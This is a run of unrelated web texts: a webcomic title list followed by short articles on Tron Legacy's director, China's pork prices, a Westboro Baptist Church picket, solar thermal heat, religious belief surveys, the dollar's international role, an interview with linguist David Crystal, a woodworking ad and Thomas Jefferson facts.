Cunning Punts 129 . Player Two 128 .
A Remarkable Sunset 127 .
That Special Time of Year 126 .
Spring in the Air 125 .
The Spawning Ground 124 .
Democratically Processed Vote Early , Vote Often , Vote Elf! 123 . Sheer Heart Attack 122 . Remaining Anomalous Intermission : The Hand of Dr. Zelman 121 . Born and Bread 120 .
The Nightmare Front 119 .
Suck it in !
( Sandy Debrueil Guest Comic ) 118 .
For Whom the Bell Jingles Intermission : The Surgery Intemission : Guest Comic by Beartoons Intermission : Boomerang Love 117 .
Hip to be Square 116 .
Float On 115 .
Empty Rooms , Empty Hallways 114 .
The Mask 113 .
Muggered 112 . The Tourist Trap 111 .
Gorra Light , Bud? 110 . The Spider 109 . Unfair Trade 108 .
The Magic Eye 107 .
The Vuvuzubu ’s Lament 106 .
Head in the Clouds 105 .
Spacemob 104 .
Les Connoisseurs 103 . Vampire Weekend 102 .
Cat ’s outta the Bag 101 .
Mr. Elf ’s Bad Day 100 . Rainbow ’s End 99 .
The… Storm ? 98 . Allez les Blobs ! 97 .
Hook , Line and …
96 .
Well Oil be Damned !
95 . The Printer of the Dark 94 .
Lava Lumps 93 .
Life ’s a Picnic… 92 .
Ashes to Smashes 91 .
Finger of Fun 90 .
A New Leaf 89 .
The Humongous Fungus 88 .
Restraining Ordure 87 .
Life ’s a Gas 86 .
Uncle Joe ’s Atom Chomper 85 .
The Case of the Montefiore Emeralds 84 .
Dolphin ’s Barney 83 .
Mind Over Matter 82 .
Thick as Cluck 81 .
Up the Oiseau 80 .
Snowflak 79 .
Buttered Up 78 .
Die Hardly 77 .
Zombie Aporkalypse : Epilogue 76 .
Zombie Aporkalypse Part 7 75 .
Zombie Aporkalypse Part 6 74 .
Zombie Aporkalypse Part 5 73 .
Zombie Aporkalypse Part 4 72 . Zombie Aporkalypse Part 3 71 . Zombie Aporkalypse Part 2 70 .
Zombie Aporkalypse 69 .
Royale with Quease 68 .
Sleepy Holler 67 .
Dr. Mysterio ’s Wonderarium 66 .
Mulligan , P.I. 65 . Nature Adores a Vacuum 64 .
Scourge of the Seven Servers 63 .
Your New Favourite Bland 62 .
Back again … 61 . The Echo 60 .
We Stare a Lot 59 .
The Demon Seed 58 .
The Magic Bin 57 .
Destination Moon 56 .
FtB meets Godzilla 55 .
Caught Somewhere in Time 54 .
Mr. Tinyface 53 .
Revenge of the Fallin’ Apart 52 .
Foam is where the Heart is 51 .
Beware of the… 50 .
Subterranean Homesick Blob 49 .
Candidate Elf 48 .
Battlestar Suburbia 47 .
The Mummy ’s Curse ( with extra cheese ) 46 .
Of Human Bandage 45 .
Let there be …
Argh !
44 . Pigs Might Flu 43 .
The Big Sneeze 42 .
The Christo Maze 41 .
Lift to Experience 40 .
( Water ) Foul Play 39 .
Keep Off the Grass 38 .
A Right Beating for the Wrong Guy 37 .
Grim Theft Auto 36 .
Canis Horribilis 35 .
The Mysterious Standing Stone 34 .
Emergency Exit 33 .
Voodoo Economics 32 . Rubbed the Wrong Way 31 .
Bongo bongo bongo… 30 .
Up , Up and Aweigh ! 29 . Sleight of Hat 28 .
Monkey Puncher 27 .
Viva la Resolution !
26 . A Pain in the Art 25 .
The Christmas Underground 24 .
Machine Washable at 30° 23 .
The Belt of No Return 22 .
The Great Debate 21 .
Fun in the Sun 20 .
Yellow for my torment 19 .
The Curse of the Were - Comic 18 .
The Rolling Bones 17 .
Damn Hogburgers !
16 . Live after Death 15 .
Unusual Suspects 14 .
Talent is for amateurs 13 .
Darth Blob 12 . Counterfeit Pope 11 .
Future Tense 10 .
The Mysterious Masked Blob 9 .
‘ Tis the hour …
8 . The Clairvoyant 7 . Superthought Revolution 6 . Microwaves 5 . I , Lemon Creme 4 . FTB UXO 3 . Faraday and the Cactus 2 .
Are you being ironic ?
1 . Faraday for President !
Looking at the newly released production photos from Tron Legacy , it 's hard not to be struck by how much of the film was shot on real sets .
And it turns out the film 's director , Joseph Kosinski , went to architecture school .
Advertisement
Talking to HitFix on the film 's set , Jeff Bridges praised Kosinski 's ability to plan different constructs and film them three - dimensionally for this new 3 - D film :
It 's interesting different filmmakers where they come from and what they bring to the film and [ Kosinski's ] an architect and so the film has a very , you know , heightened design feel to it .
And he hired this wonderful production designer , Darren Gilford .
And he is out of car design so it adds another thing .
It 's not somebody , you know , who is an interior decorator .
Advertisement
With the demands of 3 - D and CG movie - making , plus the need for real - life spaces that look like they could be the inside of a computer , it 's easy to see why Kosinski 's architecture background could come in handy .
( And it 's interesting that Tron Legacy 's production designer , like the designers of Avatar , is drawing on car design . )
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Here 's Kosinski , at a recent conference , talking about the intersection between " architecture , film and graphics " :
Says Kosinski :
I decided that architecture would be the kind of ultimate combination of the creative interests I had and the technical interests I had , so ...
Columbia was one of the first institutions that was giving architecture students the tools that automotive designers and visual effects facilities down in Los Angeles were using in feature films ...
Advertisement
It 's pretty interesting to hear him talk about starting a small firm after school where he and his partner wanted to blend architecture , design and film , and people thought he was crazy to think an architect could be a film director — and that it might be a waste of a good architecture degree .
The whole video's well worth watching .
More pics at the link .
[ Hitfix ]
By Alex Frangos and Juliet Ye
From China Real Time Report :
While property values go through the roof in China , the price of an important consumer staple is plunging : pork .
It ’s roiling farmers , but making some economic policymakers quite happy .
Bloomberg News
Pork prices have fallen 14 weeks in a row according to China ’s Ministry of Agriculture , their lowest level in four years , and cheaper even than some vegetables .
In the first week of April , the average hog price was 9.43 yuan ( $ 1.38 ) a kilogram .
The porcine price plummet has forced the government to add to its much vaunted frozen pork reserve , a series of icy warehouses around the country it set up a few years ago to stabilize pork prices .
One Chinese press report , citing government statistics , says live pig prices have dropped 21 % this year .
Another report says pork prices have fallen below the lowly lentil .
( In Chinese )
The hope is that by adding to the frozen pork hoard , the government demand will take enough meat off the market to drive prices back up .
Why does the government want higher prices ?
Farmers are complaining .
According to several stories in the Chinese press too many slaughtered pigs are coming to market , driving farmers to despair .
Pork plays a vital role in China ’s commerce .
There are almost half a billion pigs in China , one for every three people .
In gross terms , like in humans , China dwarfs other countries in pigs .
And there ’s no India of pigs to rival China .
The next biggest producer is the U.S. , which has 65 million pigs , according to the United Nation ’s Food and Agriculture Organization .
In fact China produces more pigs than the next 43 pork producing countries combined .
The cause of the recent glut of pigs was a reaction to a shortage just a few years ago .
An epidemic of blue pig ear disease wiped out pigs across the country and sent pork prices skyrocketing , leading inflation to dangerous levels .
The virus attacks pigs ’ reproductive systems .
After the 2007 and 2008 price spike , the government set up the frozen pork reserve and offered subsidies to pig farmers to get the pig population back up .
It seems to have worked too well .
A Ministry of Agriculture report also says changes in the economy have also curbed the growth in the nation ’s pork appetite .
Demand for pork from migrant workers in big cities has ebbed as more country folk stayed home after the economic slowdown .
There are two bright sides .
First , the lower prices are great for China ’s many pork consumers .
And falling pork prices have kept a lid on inflation , a major worry now that the economy is , according to some economists , running too hot .
China grew 11.9 % in the first quarter and had a 2.4 % inflation rate in March .
Food makes up one - third of China ’s inflation figures , according to HSBC estimates .
China ’s economic leaders have acknowledged the positive economic effect of the pork glut .
People ’s Bank of China deputy governor Zhu Min cited government efforts to boost pig populations at an investment conference in Hong Kong last month .
“ Two years ago China had a total of 420 million pigs .
Today it ’s 480 million and that 60 million makes a huge difference , ” in fighting inflation , he said .
The Westboro Baptist Church has announced it will picket the graduate of lesbian student Constance McMillen , who challenged her school ’s anti-gay policy .
The Kansas - based church , which has achieved notoriety for picketing the funerals of dead soldiers , is vehemently homophobic .
In a press release , it said : “ [ We ] will picket the graduation of Itawamba Agricultural High School to remind the parents , teachers and students of this nation that God said ‘ Thou shall not lie with mankind , as with womankind , it is abomination ’ .
“ This generation has been raised to believe that they can live for the devil and still go to heaven , that God has no standards and the biggest lie of all – that God loves everyone . ”
Ms McMillen took her school to court last month after she was barred from attending prom with her girlfriend .
The judge ruled the school had violated her right to freedom of expression but did not force it to reinstate the cancelled prom , as an alternative “ inclusive ” one was said to have been organised .
However , the 18 - year - old student said earlier this month that she and her girlfriend had been sent to a “ fake ” event with only a handful of other students , while her classmates enjoyed an event held at another venue .
Westboro Baptist Church is currently in a legal fight with the father of a dead soldier whose funeral it picketed .
Albert Snyder ’s son Matthew , a marine , was killed in Iraq and his funeral was held in 2006 in Maryland .
However , the church picketed the funeral with banners saying “ God hates fags ” and “ Thanks God for dead soldiers ” .
Mr Snyder originally sued the church for $ 5 million for invasion of privacy and emotional distress .
But when a lower court ruled their freedom of speech was protected by the First Amendment , Mr Snyder was told he must pay their legal fees of $ 16,500 ( £ 11,000 ) .
He has now decided to challenge the decision in the Supreme Court to win the original $ 5 million reward .
Glasspoint is a small , privately held company , so even under the best of circumstance , is unlikely to change the world overnight .
But the approach does seem to have possibilities , so I thought I would tell you a little about what the company says about it .
If what MacGregor says is true , companies that are currently burning natural gas for heat ( 100C to 400C or 212 F to 750 F ) and have space for solar thermal collectors may be able to economically replace part of their natural gas use with solar thermal generated heat .
The possible breakthrough I want to discuss comes in the middle range ( or perhaps upper middle range ) -- 100 to 400 degrees centigrade .
According to Rod MacGregor , CEO and founder of GlassPoint , the company has developed a new solar thermal methodology that , in that range , is cheaper than burning natural gas .
The heat generated using the new technology can be for a variety of industrial processes , including making steam for enhanced oil recovery ( EOR ) and for drying gypsum wallboard .
Low temperature collectors are flat plates generally used to heat swimming pools .
Medium - temperature collectors are also usually flat plates but are used for creating hot water for residential and commercial use .
High temperature collectors concentrate sunlight using mirrors or lenses and are generally used for electric power production .
In solar thermal applications , there are three different heat ranges , with different uses .
According to Wikipedia ,
How does the process work ?
According to MacGregor , if one wants to produce solar thermal output that can be used to economically run steam boilers to produce electricity , one wants very high temperature output , and this requires very expensive mirrors for solar concentration .
But if what one is looking for is more a mid-range of temperatures , cheaper mirrors can be used .
According to the GlassPoint website :
The above image indicates the GlassPoint 's methodology uses solar concentrating mirrors which appear not to be movable .
MacGregor indicated that nearly the entire ground surface is covered by the mirrors , since the mirrors are relatively cheap , and shadowing by other mirrors is not a concern .
He also indicated that the mirrors incorporate some sort of self - cleaning mechanism .
This approach is quoted to be 55 % to 60 % efficient , since there is no intermediate step of making electricity in the process .
GlassPoint has a number of competitors , including Brightsource Energy , austra , and eSolar , but these companies all make systems that are high - enough powered to generate electricity as well .
The pictures on their web sites seem to indicate large numbers of movable mirrors .
Brightsource indicates that for industrial processes , its systems are " competitive with fossil fuels " which is pretty good , but not as good a claim as GlassPoint 's " cheaper than natural gas " .
To keep costs down , MacGregor indicated that the units are made in China , and assembled there .
How much does this approach cost ?
According to the material I was provided , the cost of heat is $ 2.73 per MMBtu , using NREL 's 30 year level cost of energy calculation .
With incentives , the cost is quoted at $ 1.25 per MM Btu , but I am not certain how the latter price is calculated .
One incentive is a Federal tax credit of 30 % available of installations begun in 2010 .
In California , there are also salable credits associated with California Cap and Trade laws .
Since there are no carbon emissions , it avoids EPA regulation .
When this type of application is used , typically solar heat replaces only 20 % of the natural gas that would otherwise be used , because sufficient solar energy to produce solar thermal heat is only available 20 % of the time in sunny climates .
If this application were used in a not - too - sunny climate , it would replace less than 20 % of the natural gas used .
In order to really get this price , one would need the steam for the full 30 year period .
If one does not have the cash , one would also need a way of financing the purchase .
In the current credit environment , long - term loans may not be readily available .
Regarding space requirements , the material provided indicates :
GlassPoint 's solar arrays are modular and occupy less than one quarter the land area of traditional solar thermal solutions .
Although the power output varies by geographic location , a general rule of thumb is that one acre of GlassPoint solar field produces an average of 10,000 MMBtu per annum .
Applicability to enhanced oil recovery
The GlassPoint solar thermal approach was originally developed for drying gypsum wall board .
It is now being marketed for EOR applications , but it is not clear to me that any units have yet been sold for EOR purposes .
The GlassPoint system is said to produce over 50 barrels of steam per acre .
The idea of using solar thermal heat for EOR has been tested in the past , though .
In the 1980s , ARCO tried one method of EOR in the Kern County area , and more recently , Chevron tried a second method of solar thermal EOR .
Now , on the third attempt , GlassPoint believes that its approach is better .
If solar thermal can indeed be implemented cheaply , it would seem to make sense for enhanced oil recovery wherever there is heavy oil and there is still a long life contemplated in the field .
Since solar thermal is only available 20 % of the time , it would only replace 20 % of natural gas that would otherwise be used , but it would be a step in the right direction .
It would seem like solar thermal could even be used by itself , if operators would be willing to wait 5 times as long for full oil recovery , and if the melting and congealing were not too bad a problem ( perhaps in locations where the oil is not too heavy to begin with ) .
GlassPoint provided the following map showing areas where heavy oil is currently being produced , together with solar resources .
There are no doubt other areas where heavy oil is available but not being produced .
The Kern River area has been pumped for a very long time , and may be nearing the end of its life .
If this is the case , Kern River may not be the best place to test solar thermal .
But if this approach really works , it seems like there would be many areas of the world where it could be beneficially used .
Discussion
It may be that the biggest use for a cheaper solar thermal process would be in a variety of industrial processes ( besides EOR ) that burn natural gas for heat .
Many factories in sunny areas burn natural gas to produce heat for their processes .
If solar thermal heat could be used as a supplement , costs might be reduced .
If it could be used as the only source of heat ( where heat is needed only intermittently ) , the costs might be quite large .
If this approach really works as well as indicated , I would expect that there would soon be a number of other companies offering a similar product .
So use may spread more quickly than availability from a single manufacturer might suggest .
For an industrial process used by an individual company , a 30 year planning horizon is a long time .
Availability of natural gas for 30 years at reasonable prices is not something all Oil Drum readers would expect .
But in some ways , this is exactly the same issue as evaluating how beneficial wind would be as partial substitute for natural gas in electricity production over the long term .
With capital budgets constrained , there really is a significant difference between a process which needs to be bought up front and one which is available to be purchased as needed .
This constraint , plus the lack of available nearby land for solar collectors , may be the biggest constraints in implementing an idea of this type widely .
Konstantin Alexandroff
VISUAL ARTS
“ Dig deep in the hole where you buried your soul ”
I ’m not entirely sure , but I think this is the first Optipess strip with a swearword .
Feel free to go through the archives and find another to prove me wrong !
Also , this strip makes me hungry .
Most Americans believe
God is involved in their everyday lives and concerned with their personal well - being , though the well - educated and higher earners are less likely than their counterparts to believe in such divine intervention , a new study suggests .
Scott Schieman , a sociology professor at the University of Toronto , examined data from two recent national surveys of Americans and their beliefs about God 's involvement in their everyday lives .
The results , published in the March issue of the journal Sociology of Religion , suggest these beliefs differ across education and income levels .
Past research has suggested other factors involved with our religious beliefs , with one study revealing teachers are more religious than other college grads , and another suggesting women are more likely than men to believe in God .
Here are some highlights from the new findings :
82 percent of participants reported that they depend on God for help and guidance in making decisions .
71 percent said they believe that when good or bad things happen , these occurrences are simply part of God 's plan for them .
61 percent indicated they believe God has determined the direction and course of their lives .
32 percent agreed with the statement : " There is no sense in planning a lot because ultimately my fate is in God 's hands . "
Overall , participants with more education and higher income were less likely to report beliefs in divine intervention .
But among the well - educated and higher earners , those who were more involved in religious rituals reported similar levels of beliefs about divine intervention as their less - educated and less financially well - off peers .
" Many of us might assume that people of higher social class standing tend to reject beliefs about divine intervention , " Schieman said .
" However , my findings indicate that while this is true among those less committed to religious life , it is not the case for people who are more committed to religious participation and rituals . "
What is the status of the international roles of the dollar ?
Linda Goldberg
Is the dollar still the dominant international currency ?
This column argues that the answer is “ yes ” .
The dollar is used as a major form of cash currency , and is the main currency for exchange rate pegs and for invoicing foreign transactions .
Network externalities create inertia – everyone uses the dollar because everyone else is using the dollar .
By many measures , the dollar is the most prominent currency in the world .
It plays a central role in international trade and finance as both a store of value and a medium of exchange .
Many countries maintain an exchange rate regime that anchors the value of their home currency to that of the dollar .
Dollar holdings make up a large share of official foreign exchange reserves , the foreign currency deposits and bonds maintained by central banks and monetary authorities .
In international trade , the dollar is widely used for invoicing and settling import and export transactions around the world .
Despite this , the future of the dollar is the subject of active debate among economists and in the policy community ( Chinn and Frankel 2008 , Frankel 2008 , Papaioannou and Portes 2008 , Pisani - Ferry and Posen 2009 ) .
In recent research ( Goldberg 2010 ) , I examine the role of the dollar across several key areas of international trade and finance .
In this column , I present it in an abridged form for six areas ( see my article for more detail ) .
Jumping ahead , my conclusion is that the dollar retains its status as the dominant international currency in all major categories of use .
What are the facts ?
The dollar is a major form of cash currency around the world .
The majority of dollar banknotes are estimated to be held outside the US .
More than 70 % of hundred - dollar notes and nearly 60 % of twenty - and fifty - dollar notes are held abroad , while two - thirds of all US banknotes have been in circulation outside the country since 1990 ( Figure 1 ) .
Figure 1 . Share of US banknotes held outside the US
Source : Federal Reserve Bank of New York estimates , based on U.S. Treasury Department ( 2005 )
The dollar remains prominent in exchange rate arrangements .
While the dollar was the central currency in the Bretton Woods period , today there are alternative choices available .
Nevertheless , many countries have dollar - based exchange rate arrangements .
With exchange - rate regimes defined according to the Reinhart and Rogoff ( 2004 ) approach , seven countries currently are dollarised or have currency boards using the dollar and eighty - nine have a pegged exchange rate against the dollar ( Table 1 ) .
The share of countries linking their currency to the dollar in some manner has been stable since 1995 , and this group represents more than a third of world GDP ( excluding the US ) .
Table 1 . Countries reporting dollar - based exchange rate arrangements
The dollar remains the dominant currency in foreign exchange reserve accounts .
Foreign governments ’ foreign exchange reserve accounts , essentially the governments ’ foreign currency savings , can be large .
In 2009 , dollar assets accounted for about two - thirds of the reserve assets of industrialised and developing countries ( Figure 2 ) .
Figure 2 . Foreign currency reserve holdings
Source : International Monetary Fund , Currency Composition of Official Foreign Exchange Reserves ( CCFER ) data
Changes among industrialised countries
Among industrialised countries ’ holdings , a sharp jump in the dollar share occurred between 1995 and 2000 .
The rise can be explained primarily by changes in the reserve holdings of euro - area countries .
With the introduction of the euro , the legacy currency reserves of euro - area countries – the deutsche marks , francs , lira , and other currencies replaced by the euro – were reclassified as local currencies and therefore were no longer considered foreign currency reserves ; this shift in the composition of the countries ’ reserve portfolios meant that the dollar assumed a much larger share of the remaining reserves .
Since 2000 , the dollar share declined only modestly in the portfolios of industrialised countries .
Although a decline in reserve holdings occurred during the global financial crisis , the dollar share of reserve holdings for both industrialised and developed countries remained above 60 % .
Other measures of a prominent currency
The dollar is a leading transaction currency in the foreign exchange markets .
With an 86 % share in the volume of international trade and financial markets – more than twice the share of the euro – the dollar continues to dominate these markets ( Table 2 ) .
Turnover volumes in the foreign exchange markets have more than doubled in the past decade , implying large numbers of transactions measured in reference to , or involving , the dollar .
Table 2 . Turnover in traditional foreign exchange markets ( percent )
Another likely contributor to the dollar ’s leading role in foreign exchange transactions is the currency ’s widespread use in the invoicing of international trade .
As shown in Goldberg and Tille ( 2008 ) , the use of the dollar in export invoicing is substantial and far exceeds what could be explained by country exports to the US .
Some of the countries with strong dollar use are in proximity to the US ( Canada , Mexico ) .
Latin American , and Asia , or are commodity - intensive exporters .
The dollar also serves as a prominent currency in the international debt markets ( European Central Bank 2009 , Couerdacier and Martin 2007 , and Thimann 2008 ) .
One measure is the share of all outstanding debt securities , issued anywhere in the world , denominated in dollars .
According to this measure , the dollar ’s share stands at approximately 39 % , down only slightly from a high of 42 % in 1999 .
The dollar remains the primary financing currency for issuers in the Middle East , Latin America , Asia , and the Pacific area .
The euro dominates issuances in Scandinavia , the UK , and the new member states of the European Union .
Issuers in Africa have roughly an equal reliance on dollars and euros .
Conclusion
The international role of the dollar remains substantial a decade after the introduction of the euro , and despite changes in the value of the dollar and the financial turmoil that began in 2007 .
Factors that may have contributed to this continuing strength include inertia in currency use in certain transactions ( Krugman 1980 ) .
That is , the dollar ’s established and deep role in international markets may make it difficult for users to shift to a less entrenched currency – this is the logic of network externalities .
In the markets for international trade and finance , higher transaction volumes contribute to lower bid-ask spreads and reduced implicit transaction costs for using dollars – advantages that in turn reinforce the use of the dollar in these transactions .
This self - reinforcing pattern exemplifies the inertia phenomenon described earlier – once a currency is well established , it is not easily displaced from this role .
Everyone uses the dollar because everyone else is using the dollar .
A second factor is less history - dependent .
Users tend to favour the currency of countries that have large economies and relatively stable rates of output and employment growth , as well as low and stable inflation .
Finally , users may be predisposed to choose the dollar because it is linked to their own currency through their exchange rate regime and because key commodities are priced in dollars .
While our evidence overall suggests that the dollar is likely to remain prominent as an international currency , its primacy can not be taken for granted .
The pound sterling was the dominant reserve currency in the first half of the twentieth century until it was overtaken by the dollar .
1
This observation serves as a reminder that –despite present trends – transitions are possible .
As the size and structure of the global economy change , international currency use may change as well .
Changes to the global economy could have major implications for the international transmission of shocks , the value of the dollar , and welfare across economies ( for example , see Goldberg and Tille 2009 ) .
Accordingly , it is important to monitor use of the dollar in international economic activity and to understand the possible causes and consequences of the dollar ’s international role .
Ongoing vigilance in policy is therefore warranted .
Disclaimer :
The views presented are those of the authors and do not necessarily represent the views of the Federal Reserve Bank of New York or the Federal Reserve System .
Footnotes
1 The timing of this shift is debated .
Eichengreen and Flandreau ( 2008 ) argue that the dollar first overtook sterling in the mid-1920s .
Chinn and Frankel ( 2008 ) suggest that the change occurred after World War II .
References
Bank for International Settlements .
Triennial Central Bank Survey of Foreign Exchange and Derivatives Market Activity .
Chinn , Menzie , and Jeffrey A Frankel ( 2008 ) , “ Will the Euro Rival the Dollar ?
A Debate ” , International Finance , 11( 1):49 - 73 , Spring .
Coeurdacier , Nicolas , and Philippe Martin ( 2007 ) , “ The Geography of Asset Trade and the Euro : Insiders and Outsiders ” , Centre for Economic and Policy Research Discussion Paper no .
6032 , January .
Eichengreen , Barry , and Marc Flandreau ( 2008 ) , “ The Rise and Fall of the Dollar , or When Did the Dollar Replace Sterling as the Leading Reserve Currency ? ” , Unpublished paper , University of California at Berkeley .
European Central Bank ( 2009 ) , “ The International Role of the Euro ” , July .
Frankel , Jeffrey ( 2008 ) , “ The euro could surpass the dollar within ten years ” , VoxEU.org , 18 March .
Goldberg , Linda ( 2010 ) , “ Is the International Role of the Dollar Changing ? ” , Federal Reserve Bank of New York , Current Issues in Economics and Finance , 16 ( 1 ) , January .
Goldberg , Linda and Cédric Tille ( 2008 ) , “ Vehicle Currency Use in International Trade ” , Journal of International Economics 76(2) :177-192 , January .
Goldberg , Linda and Cédric Tille ( 2009 ) , “ Macroeconomic Interdependence and the International Role of the Dollar ” , Journal of Monetary Economics Volume 56:7 , October .
Ilzetki , Ethan O , Carmen M Reinhart , and Kenneth S Rogoff ( 2008 ) , background material on “ Exchange Rate Arrangements in the 21st Century : Which Anchor Will Hold ? ” Unpublished paper , Harvard University .
Krugman , Paul ( 1980 ) , “ Vehicle Currencies and the Structure of International Exchange , ” Journal of Money , Credit , and Banking , 12( 3 ) : 513- 26 , August .
Papaioannou , Elias , and Richard Portes ( 2008 ) , “ Costs and Benefits of Running an International Currency ” , European Commission European Economy Economic Papers , no.348 , November .
Pisani-Ferry , Jean , and Adam S Posen ( eds ) ( 2009 ) , The Euro at Ten : The Next Global Currency ? , Washington , DC , Peterson Institute for International Economics .
Reinhart , Carmen and Kenneth Rogoff ( 2004 ) , “ The Modern History of Exchange Rate Arrangements : A Reinterpretation ” , Quarterly Journal of Economics 119 ( 1 ) :1 - 48 , February .
US Treasury Department ( 2006 ) , “ The Use and Counterfeiting of US Currency Abroad , Part 3 ” , Final Report to the Congress by the Secretary of the Treasury , in consultation with the Advanced Counterfeit Deterrence Steering Committee , September .
Were the English language ever to need an official guardian , Professor David Crystal certainly looks the part .
With a godly white beard , a pair of oval spectacles and the sort of suit that gave Open University its distinctive visual styling , he makes one feel secure in his judgments .
And rightly so : Crystal , now an honorary professor of linguistics at the Bangor University , has been ploughing this academic field for 50 years .
But the professor would , I suspect , quickly shrug off such a custodial title – not out of modesty , but principle .
Though many endangered languages need their champions , he would say , English does not require a guardian ; it is vibrant and evolving and can fend for itself .
The cacophony of conversation in the Charlotte Street Hotel bar where we meet seems to prove the point .
Crystal 's own voice , precise and steady and with a lilt that is suggestive of his youth in Liverpool , rises through it as though through a din of students waiting for a lecture .
Sitting with his wife , business partner and occasional co-author , Hilary , Crystal is here to talk about A Little Book of Language , the latest work of a prolific career .
He already has more than 100 books to his name ; some are academic but many are for the general inquisitive reader , including By Hook or by Crook : A Journey in Search of English and Shakespeare 's Words , which was co-authored by his son , Ben .
For the Crystals , linguistics is clearly a family affair .
In the jaunty early chapters of A Little Book of Language , Crystal notes how , when his four children were young , he would study them .
" We 're talking the 1960s , when the study of linguistics had hardly begun – people did not know , in a scientific way , how you developed language , " he recalls .
" Several of us linguists at that time would record our own kids , just to get some data .
There was some literature on it then , but no day - by - day , blow - by - blow examples .
I recorded all my children over the years in some shape or form .
It 's what linguists do .
You do n't talk to a linguist without having what you say taken down and used in evidence against you at some point in time . "
Something must have rubbed off .
Though his elder two children , Steven and Sue , eschewed academia , his daughter Lucy took up copywriting and his son Ben , an actor , is now following his father .
" His book Shakespeare on Toast was a runaway hit – I wish I 'd written it ! " says Crystal , before rapidly , and self - effacingly , adding : " But I could n't have – because it was so cool and modern and so street in its approach to Shakespeare .
He has examples of hip - hop Shakespearians and I would never have dared put any of that stuff into one of my books . "
A Little Book of Language is a simple history of all language , taking in phonetics , development , social uses , the internet , endangered languages and a touch of literature .
In writing it , Crystal follows in the footsteps of the Viennese art historian Ernst Gombrich who , in 1935 , wrote A Little History of the World .
This slight volume was meant to be a simple retelling of the last two millennia for an audience of children , but its first edition was declared too pacifist by Fascist Germany and banned .
Thirty years later , Gombrich reprised the project , translated the book into English and updated it , and it became a bestseller .
Yale Press , noticing the success of such simplicity , has since developed a whole Little History series , and asked Crystal to write one on language .
This all sounds very innocent , but books for children can be a contentious issue – Gombrich 's experience being an extreme example .
Language , as much as history , is part of a national identity and cannot escape contemporary debates .
And since Crystal began his academic career in the early 1960s , there have been dramatic shifts in how the English language is taught .
" The ethos of 50 years ago was that there was one kind of English that was right and everything else was wrong ; one kind of access that was right and everything else was inferior , " he says .
" Then nobody touched language for two generations .
When it gradually came back in , we did n't want to go back to what we did in the 1950s .
There 's a new kind of ethos now . "
What has replaced it is something far more fluid – descriptive rather than prescriptive , as the terminology goes .
In schools , appropriateness has replaced the principle of correctness .
" Now , one looks at all varieties of language and asks why they are used , says Crystal .
" We are rearing a generation of kids who are more equitable and more understanding about the existence of language variety and why it is there . "
This does n't sit easy with the traditionalists , of whom there are still many – as Lynne Truss 's bestselling Eats , Shoots and Leaves proved .
That book was a dog - whistle call to all those who missed the old certainties of grammar textbooks .
" It is interesting , " notes Crystal , his usually cool delivery tinged suddenly with a hint of exasperation .
" What did Lynne do after Eats , Shoots and Leaves ?
She wrote Talk to the Hand [ a book about rudeness and courtesy ] .
Anyone interested in language ends up writing about the sociological issues around it . "
Crystal calls this a " moral panic " over " mythologies " – his clearest example being the belief that text messaging is destroying children 's ability to spell .
" It 's all nonsense , but people believe it . "
He addressed this in his book Txtng : the Gr8 Db8 , published three years ago , in which he found that " txt speak " accounted for
barely 10 per cent of the contents of the messages exchanged , and noted that abbreviations have always been part of the English language .
Having solved that argument with some decent data , he tells me that he 's now moving on to Twitter .
" On Twitter [ which limits each written entry to 140 characters ] , you do n't get the range of texting abbreviations you get in text messaging .
It 's a more sophisticated kind of communicative medium .
You get semantic threads running through it .
When you start counting thousands and thousands of messages , you suddenly realise that on the whole it's a new art form in the making . "
The breadth of the internet means that language is morphing not just on grocers ' signs and in school playgrounds , but on a far more fundamental level .
" All these different genres – instant messaging , blogging , chatrooms , virtual worlds – have evolved different sets of communicative strategies , which means that you can look at the language and say , ' That must be an example of a chatroom , that must be an example of a tweet , ' and you can predict it . "
In a curious counter - example , Crystal mentions that he had to speak to a Commons Select Committee last July on the propriety of language .
It was n't evolving English that was the problem .
" There was a great deal of concern about what plain English was in a parliamentary context and how it might be improved , because there is a lot of unnecessary obfuscation . "
I wonder whether this was in response to the expenses scandal which broke in May , when some MPs claimed that they had been faithful to the wording of the rules .
Crystal wo n't be drawn beyond one enigmatic thought : " It all comes down to language at the end of the day .
This is what it says – but what does it say ? "
Becoming involved in bigger arguments seems to be an occupational hazard for a linguist .
Whether it be education , politics or neuroscience , we all have a vested interest in the implications of language .
Our conversation turns to the recent news of a man who had been lying in a vegetative state for seven years before doctors managed to establish basic communication by scanning his brainwaves .
" We are moving fast in a direction where you will be able to see what people are saying , " says Crystal , optimistically .
" We 've got to the stage where you can see the complexity of language processing .
We 're not at the stage yet of being able to see clearly individual sentence patterns and words , but it 's not long off . "
Surely this has huge implications , not least for personal liberties ?
" It is the case that virtually every language issue resolves into a social or political or psychological issue , " Crystal reminds me .
" Language has no independent existence apart from the people who use it .
It is not an end in itself ; it is a means to an end of understanding who you are and what society is like .
At which point , you know that a linguist has to bow out and say , ' This is bigger than me . ' "
And again , Crystal , though eminently qualified , shrugs off any mantle of authority that I try to impose on him , and takes an insouciant sip of his mineral water .
The extract
A Little Book of Language , By David Crystal ( Yale £ 14.99 )
Click Here To Get Started Now With 14,000 Woodworking Project Plans
Woodworking project plans are at your finger tips .
Possibly you have been flattered by some nice pieces of furniture or other wood furnishings that you really would love to have , but it ’s just a tad too pricey .
So , the thought starts running through your mind that it might not be so difficult to build yourself if you had easy step - by - step and simple woodworking plans to follow .
Evidently , you have interest in woodworking or you would not be researching on how to begin .
No matter what type of inventive wood project you would like to fabricate , having good plans with step by step instructions , a drawing with measurements and a visual image is very helpful when building your indoor or outdoor projects .
All of us are inspired to some extent but the fact remains that not everyone can make use of his or her own imagination .
In such instances , we add our own ideas to the primary plans .
Woodworking is a wonderful quest that calls for your skills and creativity .
Many of us have a desire to create our own monuments that we can be proud of , and by make use of woodworking plans gives you a decisive advantage .
Working with your own hands can be a very influential form of self - esteem .
There are a number of ways to create this and you have chosen woodworking .
At the very minimum , there is an endless supply of information on every phase of woodworking .
There is nothing holding you back from your dreams when you can find the answers .
So you have a splendid idea for a woodworking project .
Could it be a storage cabinet in the garage , or a bookshelf in the living room or even a small cabinet for your wife ’s sewing .
Start with a small project , such as , a birdhouse or bookshelf .
Do n't start with a major a project just because you can picture how great it will look when you are finished .
You might end up frustrated and forget about woodworking altogether .
Facts on Thomas Jefferson
This is a list of basic Facts on Thomas Jefferson .
Thomas Jefferson was a Virginia lawyer who was a delegate to the Continental Congress , the writer of the Declaration of Independence , a governor of Virginia , ambassador to France and Secretary of State under President George Washington .
In addition to these achievements , Thomas Jefferson was elected the third President of the United States , serving two terms in this highest office in the land .
